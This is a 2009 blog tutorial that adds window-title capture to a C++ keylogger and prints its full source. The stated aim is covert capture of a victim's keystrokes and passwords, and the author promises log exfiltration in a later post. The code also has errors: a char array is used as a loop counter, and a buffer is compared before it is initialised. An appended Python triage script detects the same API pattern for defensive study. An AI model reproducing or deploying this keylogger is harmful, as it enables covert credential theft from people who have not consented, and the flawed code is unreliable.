Thursday, May 7, 2009

Adding to our C++ Keylogger (Window Text and Special Characters)

Well, for those of you who have tried it out so far, nobody subscribed =( but anyway I guess I am obligated to add more. Please, guys, subscribe and comment, otherwise I won't know if anyone is reading this.

---------------------------------------------------------------------------------

Anyways, here goes.
So as of now, we have a very simple keylogger: it takes in the keys that the victim types and outputs them to a specified file. There are many problems with this keylogger, and I'll help you solve one of them with this post.

Firstly, you would have to go to the victim's computer to retrieve the file, and most of the time this isn't a possibility. Also, if you have tried the keylogger out, you would have noticed that it doesn't resolve many of the keys like "Enter" and "Shift". The next post will deal with FTP uploading and resolving these characters, but this post will focus on a very important necessity for any keylogger: getting the window. The problem with many loggers is that you may have some passwords or something, but you will never know what these passwords are for. So for that, you need to be able to get the window text.

Also remember that if you get the window text for a browser, it also tells you what webpage they are on, e.g. Yahoo Mail, so this function can be very useful.

First, we have to familiarize ourselves with the APIs that will help us get the window text. They are pretty self-explanatory really: GetWindowText() and GetForegroundWindow(). The MSDN pages for both are, respectively:
GetWindowText
GetForegroundWindow

Okay, so after reading those we can see that GetForegroundWindow returns a handle to the foreground window, i.e. whatever window is selected. GetWindowText copies the text of the window into a buffer of a specified length.

So in order to get the window text of the foreground window all we would have to do would be:



void getwindow(){
char window[MAX_PATH];
HWND currentwindow;
currentwindow = GetForegroundWindow();
GetWindowText(currentwindow, window, sizeof(window));
}


So this simple function stores the handle of the foreground window in "currentwindow" and then uses GetWindowText to fill the buffer "window" (its size given by sizeof) with the name of the current window. This is all good, but when it comes to implementing it in our keylogger, putting this into the main function will just get the window text once, at the start of the program. In contrast, putting this in the check-keys loop will get the window text and print it out every single time it goes through the loop, which means that your log will be flooded with the same window title.

However, what if we put it in the loop, but only print it if the window has changed?
In other words, why don't we check what the window is, and then if that changes, output the new window? That way we will have the names of all the windows that were typed into, nothing more and nothing less.

So let's modify our logger function:



void Logger()
{
char key[20];
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
StoreKey(key);
}
}
}
}


So let's have a look at what this code does differently from our old Logger() function. First, it initializes the currentwindowtitle variable with the current window. Then, every time it loops through, it checks whether the new window is the same as the old window, using the return value from the strcmp (string compare) function, and if it is different, it outputs the title to the log file. It then also copies the current title over the stored one with strcpy and does it all over again. So there we have it, a keylogger that can tell you exactly where your victim is typing their passwords etc.

Have fun, and remember to subscribe and to comment. Remember, if you want to request any functionality for the logger or anything, COMMENT and recommend this site to all your friends! Next post will deal with some very exciting stuff, like sending you the logs, so remember to subscribe so you know when that comes out. Come on guys, show me some love. The following is the complete code of our keylogger so far.

---------------------------------------------------------------------------------


#include <windows.h>
#include <fstream>


using namespace std;

void StoreKey(char key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}

void Logger()
{
char key[20];
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
StoreKey(key);
}
}
}
}

int main(){
Logger();
return 1;
}


-------------------------------------------------------------------------------

Remember to subscribe and COMMENT if you want me to keep writing this. Thanks Guys.

-badfish303
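
Seen from the defending side, the logger built in this post has a recognizable static footprint: GetAsyncKeyState imported together with GetForegroundWindow and GetWindowText, plus the hard-coded log path. The triage script below is an added example, not code from the original post; the sample byte strings and the verdict labels are constructed for illustration.

```python
import re

# Null-terminated names as stored in a PE import name table. GetWindowText is
# exported as GetWindowTextA (ANSI) or GetWindowTextW (wide), so accept both.
API_PATTERNS = {
    "GetAsyncKeyState": re.compile(rb"GetAsyncKeyState\x00"),
    "GetForegroundWindow": re.compile(rb"GetForegroundWindow\x00"),
    "GetWindowText": re.compile(rb"GetWindowText[AW]\x00"),
}
# Log path hard-coded in the post's code, as narrow and UTF-16LE strings.
LOG_PATH = "C:\\storekey.txt".lower()
LOG_PATH_FORMS = (LOG_PATH.encode("ascii"), LOG_PATH.encode("utf-16-le"))


def triage(data: bytes) -> dict:
    """Report which of the post's API names and log path occur in a file image."""
    apis = sorted(name for name, pat in API_PATTERNS.items() if pat.search(data))
    polls_keys = "GetAsyncKeyState" in apis
    reads_title = {"GetForegroundWindow", "GetWindowText"} <= set(apis)
    lowered = data.lower()  # Windows paths are case-insensitive
    has_log_path = any(form in lowered for form in LOG_PATH_FORMS)
    if polls_keys and reads_title:
        verdict = "suspicious"  # key polling and foreground-title capture together
    elif polls_keys or has_log_path:
        verdict = "review"      # games and hotkey tools also poll key state
    else:
        verdict = "clean"
    return {"apis": apis, "log_path": has_log_path, "verdict": verdict}


# Constructed byte strings standing in for file contents (not real binaries).
SAMPLE_LOGGER = (b"MZ\x90\x00" + b"\x00" * 16 + b"\x12\x01GetAsyncKeyState\x00"
                 b"\x45\x01GetForegroundWindow\x00\x67\x01GetWindowTextA\x00"
                 b"C:\\storekey.txt\x00")
SAMPLE_GAME = b"MZ\x90\x00" + b"\x00" * 16 + b"\x12\x01GetAsyncKeyState\x00Direct3DCreate9\x00"
SAMPLE_EDITOR = b"MZ\x90\x00" + b"\x00" * 16 + b"\x67\x01GetWindowTextW\x00CreateFileW\x00"

if __name__ == "__main__":
    for label, blob in [("logger", SAMPLE_LOGGER), ("game", SAMPLE_GAME),
                        ("editor", SAMPLE_EDITOR)]:
        print(label, triage(blob))
```

A name match is a triage signal only: it says the imports are present, not how they are used, so a "suspicious" result is a reason to look at the file's behaviour, not a conclusion.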

6 comments:

  1. Good posts. Follow this way ;) When will you post the next lesson?

  2. today or tomorrow

    be sure to recommend this to your friends!

  3. If you're wondering who is watching/reading these, you might be able to put a "web-stat tracker" on this site. (I have clicky [http://static.freewebs.getclicky.com/] but you might not be able to get it outside of a freewebs created site, I'll check for you.............please wait)

  4. CORRECTION!!!!!!
    goto www.getclicky.com
    register
    type: name, username, password, URL of website you want to track, E-mail, etc.
    And you might have to copy&paste the auto-generated javascript code onto the website
    (note: if blogspot doesn't allow javascript on your site, then just look for the link for a code w/out javascript)
    Clicky tells you: the time the person visits, how many actions they took, how long they were there, where they came from, what their IP is, what OS they have, what city their computer is in, who their internet provider is, and what browser they have.
    Unfortunately, if you use the non-javascript code (it's an image based tracker), it can't do most of those (i.e. where they came from, etc.) because an image tracking system can only do so much.
    hope this was of use to you
    ByE
    P.S. the C++ keylogger is great, I'm gonna bookmark your site and read them all :)

  5. KK I keep getting conversion errors while compiling it with Visual C++ 2008 Express plz help :(

  6. Hey Badfish, I'm pretty noob at C++, I can't write it but I can understand most of it. I'm interested in learning however and ur tuts are awesome. I registered hoping you would finish your keylogging tutorial and also to ask you for contact information if you didn't mind teaching me some stuff :) ~Iconic
